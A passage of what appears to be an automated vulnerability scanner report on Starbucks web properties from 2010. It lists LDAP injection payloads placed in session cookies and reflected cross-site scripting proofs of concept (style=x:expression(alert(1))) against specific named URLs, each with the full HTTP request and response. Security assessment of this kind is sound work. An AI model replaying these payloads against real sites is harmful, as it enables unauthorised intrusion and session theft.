   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(do
...[SNIP]...

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.

The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="java
...[SNIP]...

Request 2

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)!(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#'
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 76 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=169adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" />
...[SNIP]...

3.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=ntjkwoi4dh2ibi45qfgoseio; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:15:04 GMT
Content-Length: 41208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" />
...[SNIP]...

3.3. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:25 GMT
Content-Length: 56826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/>
...[SNIP]...

3.4. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:00:23 GMT
Connection: close
Content-Length: 37678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/>
...[SNIP]...

3.5. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:15 GMT
Connection: close
Content-Length: 39114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/>
...[SNIP]...

3.6. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:03:56 GMT
Connection: close
Content-Length: 43928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/>
...[SNIP]...

3.7. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:39 GMT
Connection: close
Content-Length: 52482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/>
...[SNIP]...

3.8. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
